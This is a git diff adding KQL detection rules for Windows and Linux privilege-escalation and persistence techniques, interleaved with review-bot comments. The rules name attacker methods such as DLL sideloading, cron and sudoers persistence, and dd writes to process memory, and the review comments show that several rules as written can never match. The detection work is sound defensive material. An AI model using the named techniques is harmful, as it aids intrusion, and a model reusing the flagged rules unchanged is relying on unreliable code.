endswith "\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt*")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql b/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql new file mode 100644 index 00000000..2bdb2f95 --- /dev/null +++ b/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql 
@@ -0,0 +1,12 @@
+// Title: Outlook Macro Execution Without Warning Setting Enabled
+// Author: @ScoubiMtl
+// Date: 2021-04-05
+// Level: high
+// Description: Detects the modification of Outlook security setting to allow unprompted execution of macros.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\Security\\Level"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql b/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql
new file mode 100644
index 00000000..99dd7739
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql
@@ -0,0 +1,13 @@
+// Title: Password Set to Never Expire via WMI
+// Author: Daniel Koifman (KoifSec)
+// Date: 2025-07-30
+// Level: medium
+// Description: Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1047, attack.t1098
+// False Positives:
+// - Legitimate administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "useraccount" and ProcessCommandLine contains " set " and ProcessCommandLine contains "passwordexpires" and ProcessCommandLine contains "false") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql b/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql
new file mode 100644
index 00000000..5a6ded70
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql
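Review bot: `RegistryValueData contains "0x00000001"` expects Sysmon's `DWORD (0x00000001)` rendering; DeviceRegistryEvents, as far as I have seen, reports DWORDs as plain decimal strings, so this never matches, and `RegistryKey endswith "\\Outlook\\Security\\Level"` compares the value name against the key path. A form that fits this table is `| where ActionType =~ "RegistryValueSet" and RegistryKey endswith "\\Outlook\\Security" and RegistryValueName =~ "Level" and RegistryValueData == "1"`. Validate the rendering in advanced hunting before merging, since a silent high-level rule is the costliest kind.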
@@ -0,0 +1,12 @@
+// Title: Persistence Via Cron Files
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: medium
+// Description: Detects creation of cron file or files in Cron directories which could indicates potential persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003
+// False Positives:
+// - Any legitimate cron file.
+
+DeviceFileEvents
+| where (FolderPath startswith "/etc/cron.d/" or FolderPath startswith "/etc/cron.daily/" or FolderPath startswith "/etc/cron.hourly/" or FolderPath startswith "/etc/cron.monthly/" or FolderPath startswith "/etc/cron.weekly/" or FolderPath startswith "/var/spool/cron/crontabs/") or (FolderPath contains "/etc/cron.allow" or FolderPath contains "/etc/cron.deny" or FolderPath contains "/etc/crontab")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql b/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql
new file mode 100644
index 00000000..fed1a190
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql
@@ -0,0 +1,12 @@
+// Title: Persistence Via Sudoers Files
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: medium
+// Description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003
+// False Positives:
+// - Creation of legitimate files in sudoers.d folder part of administrator work
+
+DeviceFileEvents
+| where FolderPath startswith "/etc/sudoers.d/"
\ No newline at end of file
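Review bot: `FolderPath startswith "/var/spool/cron/crontabs/"` covers Debian-family hosts only; on RHEL-family systems user crontabs live directly under `/var/spool/cron/`, so persistence there is missed. Changing it to `FolderPath startswith "/var/spool/cron/"` covers both layouts. The clause also has no ActionType filter, so deletions of cron files alert alongside creations; acceptable, but the description only says "creation".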
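Review bot: The description says the rule covers creation of the sudoers file or files in sudoers.d, but the where clause only has `FolderPath startswith "/etc/sudoers.d/"`, so a write to `/etc/sudoers` itself is missed; add `or FolderPath == "/etc/sudoers"`. Separately, the tag `attack.t1053.003` is the cron technique; for sudoers the relevant sub-technique is T1548.003, so the header should be corrected even if the upstream rule carries the same tag.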
diff --git a/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql b/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql new file mode 100644 index 00000000..03fea458 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql @@ -0,0 +1,12 @@ +// Title: Potential COM Object Hijacking Via TreatAs Subkey - Registry +// Author: Kutepov Anton, oscd.community +// Date: 2019-10-23 +// Level: medium +// Description: Detects COM object hijacking via TreatAs subkey +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Maybe some system utilities in rare cases use linking keys for backward compatibility + +DeviceRegistryEvents +| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey endswith "HKU*" and RegistryKey endswith "Classes\\CLSID*" and RegistryKey contains "\\TreatAs")) and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql new file mode 100644 index 00000000..b126ae78 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql 
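Review bot: The where clause requires both `RegistryKey endswith "HKU*"` and `RegistryKey endswith "Classes\\CLSID*"`, two endswith conditions with literal asterisks that cannot both hold, so this rule never fires. DeviceRegistryEvents also writes user hives as `HKEY_USERS\<SID>\...` rather than `HKU`, as far as I know. A working form is `| where ActionType =~ "RegistryKeyCreated" and RegistryKey startswith "HKEY_USERS\\" and RegistryKey contains "\\Classes\\CLSID\\" and RegistryKey endswith "\\TreatAs" and InitiatingProcessFolderPath !~ "C:\\WINDOWS\\system32\\svchost.exe"`.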
@@ -0,0 +1,10 @@ +// Title: Potential DLL Injection Or Execution Using Tracker.exe +// Author: Avneet Singh @v3t0_, oscd.community +// Date: 2020-10-18 +// Level: medium +// Description: Detects potential DLL injection and execution using "Tracker.exe" +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.001 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " /d " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\tracker.exe" or ProcessVersionInfoFileDescription =~ "Tracker")) and (not((ProcessCommandLine contains " /ERRORREPORT:PROMPT " or (InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\MSBuild.exe" or InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\amd64\\MSBuild.exe")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql new file mode 100644 index 00000000..fe67df0a --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql 
@@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Of DbgModel.DLL +// Author: Gary Lobermier +// Date: 2024-07-11 +// Level: medium +// Description: Detects potential DLL sideloading of "DbgModel.dll" +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule + +DeviceImageLoadEvents +| where FolderPath endswith "\\dbgmodel.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not((FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WinDbg_" or (FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql new file mode 100644 index 00000000..259d82d6 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql 
@@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Of MpSvc.DLL +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema +// Date: 2024-07-11 +// Level: medium +// Description: Detects potential DLL sideloading of "MpSvc.dll". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule. + +DeviceImageLoadEvents +| where FolderPath endswith "\\MpSvc.dll" and (not((FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql new file mode 100644 index 00000000..9669b6a4 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql 
@@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Of MsCorSvc.DLL +// Author: Wietze Beukema +// Date: 2024-07-11 +// Level: medium +// Description: Detects potential DLL sideloading of "mscorsvc.dll". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule. + +DeviceImageLoadEvents +| where FolderPath endswith "\\mscorsvc.dll" and (not((FolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql new file mode 100644 index 00000000..ee418ee3 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential DLL Sideloading Using Coregen.exe +// Author: frack113 +// Date: 2022-12-31 +// Level: medium +// Description: Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.t1055 + +DeviceImageLoadEvents +| where InitiatingProcessFolderPath endswith "\\coregen.exe" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Program Files\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file 
diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql new file mode 100644 index 00000000..43108576 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Via DeviceEnroller.EXE +// Author: @gott_cyber +// Date: 2022-08-29 +// Level: medium +// Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". +Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "/PhoneDeepLink" and (FolderPath endswith "\\deviceenroller.exe" or ProcessVersionInfoOriginalFileName =~ "deviceenroller.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql new file mode 100644 index 00000000..afa1f482 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql 
@@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Via VMware Xfer +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-02 +// Level: high +// Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where (FolderPath endswith "\\glib-2.0.dll" and InitiatingProcessFolderPath endswith "\\VMwareXferlogs.exe") and (not(FolderPath startswith "C:\\Program Files\\VMware\\")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql b/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql new file mode 100644 index 00000000..20104c27 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql 
@@ -0,0 +1,10 @@
+// Title: Potential Initial Access via DLL Search Order Hijacking
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-21
+// Level: medium
+// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1566, attack.t1566.001, attack.initial-access, attack.t1574, attack.t1574.001, attack.defense-evasion
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath
contains "\\api-ms-win-core-"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql b/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql
new file mode 100644
index 00000000..4751f88a
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql
@@ -0,0 +1,10 @@
+// Title: Potential Linux Process Code Injection Via DD Utility
+// Author: Joseph Kamau
+// Date: 2023-12-01
+// Level: medium
+// Description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.009
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "of=" and ProcessCommandLine contains "/proc/" and ProcessCommandLine contains "/mem") and FolderPath endswith "/dd"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql
new file mode 100644
index 00000000..c84c2e75
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Mpclient.DLL Sideloading
+// Author: Bhabesh Raj
+// Date: 2022-08-02
+// Level: high
+// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\mpclient.dll" and (InitiatingProcessFolderPath endswith "\\MpCmdRun.exe" or InitiatingProcessFolderPath endswith "\\NisSrv.exe")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql
new file mode 100644
index 00000000..04c13655
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql
@@ -0,0 +1,12 @@
+// Title: Potential Mpclient.DLL Sideloading Via Defender Binaries
+// Author: Bhabesh Raj
+// Date: 2022-08-01
+// Level: high
+// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\MpCmdRun.exe" or FolderPath endswith "\\NisSrv.exe") and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or FolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql
new file mode 100644
index 00000000..a138f10c
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Attempt Via Existing Service Tampering
+// Author: Sreeman
+// Date: 2020-09-29
+// Level: medium
+// Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1543.003, attack.t1574.011
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "sc " and ProcessCommandLine contains "config " and ProcessCommandLine contains "binpath=") or (ProcessCommandLine contains "sc " and ProcessCommandLine contains "failure" and ProcessCommandLine contains "command=")) or ((ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin$" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh$" or ProcessCommandLine contains ".reg$" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl") and ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "FailureCommand") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "ImagePath")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql
new file mode 100644
index 00000000..e89c136c
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql
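Review bot: Three of the extension patterns in the `where` clause carry a trailing `$` — `".bin$"`, `".msh$"` and `".reg$"` — which `contains` treats as a literal character, so those branches only match a command line that literally contains `.bin$`. The `$` looks like a regex end-anchor that survived conversion from the Sigma source. Drop it so the branches behave like their siblings, `ProcessCommandLine contains ".bin"` (likewise `.msh` and `.reg`), or use `ProcessCommandLine endswith ".bin"` if the anchoring was intended.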
@@ -0,0 +1,14 @@
+// Title: Potential Persistence Attempt Via Run Keys Using Reg.EXE
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2021-06-28
+// Level: medium
+// Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
+// - Legitimate administrator sets up autorun keys for legitimate reasons.
+// - Discord
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and (ProcessCommandLine contains "reg" and ProcessCommandLine contains " add ") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql b/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql
new file mode 100644
index 00000000..10361e4b
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Using DebugPath
+// Author: frack113
+// Date: 2022-07-27
+// Level: medium
+// Description: Detects potential persistence using Appx DebugPath
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+
+DeviceRegistryEvents
+| where (RegistryKey contains "Classes\\ActivatableClasses\\Package\\Microsoft." and RegistryKey endswith "\\DebugPath") or (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft." and RegistryKey endswith "\\(Default)")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql
new file mode 100644
index 00000000..23a1da4f
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql
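Review bot: `RegistryKey endswith "\\DebugPath"` and `RegistryKey endswith "\\(Default)"` look for the value name at the end of the key path, but in DeviceRegistryEvents the value name is carried in `RegistryValueName` while `RegistryKey` holds only the key, so these conditions are unlikely to ever match (the default value has no name there, as far as I can tell, so matching on `(Default)` needs an empty `RegistryValueName`). The Sigma `TargetObject` field combines key and value name and should be split on conversion, e.g. `RegistryKey contains "Classes\\ActivatableClasses\\Package\\Microsoft." and RegistryValueName =~ "DebugPath"`. The same pattern affects the App Paths Default Property (`(Default)`/`Path`), GlobalFlags (`GlobalFlag`, `ReportingMode`, `MonitorProcess`), Logon Scripts - Registry, Outlook LoadMacroProviderOnBoot, Scrobj.dll COM Hijacking, Shim Database In Uncommon Location (`DatabasePath`), PSFactoryBuffer, DbgManagedDebugger and Windows Telemetry (`Command`) hunks.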
@@ -0,0 +1,16 @@
+// Title: Potential Persistence Via App Paths Default Property
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence
+The entries found under App Paths are used primarily for the following purposes.
+First, to map an application's executable file name to that file's fully qualified path.
+Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.012
+// False Positives:
+// - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "\\Users\\Public" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-" or RegistryValueData contains "rundll32" or RegistryValueData contains "regsvr32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains ".bat" or RegistryValueData contains ".hta" or RegistryValueData contains ".dll" or RegistryValueData contains ".ps1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths" and (RegistryKey endswith "(Default)" or RegistryKey endswith "Path")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql
new file mode 100644
index 00000000..0127fdbd
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql
@@ -0,0 +1,15 @@
+// Title: Potential Persistence Via AppCompat RegisterAppRestart Layer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-01-01
+// Level: medium
+// Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
+This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
+This can be potentially abused as a persistence mechanism.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+// False Positives:
+// - Legitimate applications making use of this feature for compatibility reasons
+
+DeviceRegistryEvents
+| where RegistryValueData contains "REGISTERAPPRESTART" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers*"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql
new file mode 100644
index 00000000..63c6d8a9
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql
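Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers*"` treats the `*` as a literal character, so it can only match a key whose name ends in an asterisk; the `*` is a Sigma wildcard that was not translated. A `contains` on the prefix expresses the intent, `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers\\"`. The same untranslated wildcard appears in the GlobalFlags hunk (`CurrentVersion*`, `Image File Execution Options*`, `SilentProcessExit*`, where two `endswith` conditions on the same field can never both hold), in both Shim Database hunks (`InstalledSDB*`, `Custom*`) and in the Windows Telemetry hunk (`TelemetryController*` combined with `endswith "\\Command"`), so the converter should map a trailing `*` to `startswith`/`contains` rather than `endswith`.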
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via GlobalFlags
+// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
+// Date: 2018-04-11
+// Level: high
+// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1546.012, car.2013-01-002
+
+DeviceRegistryEvents
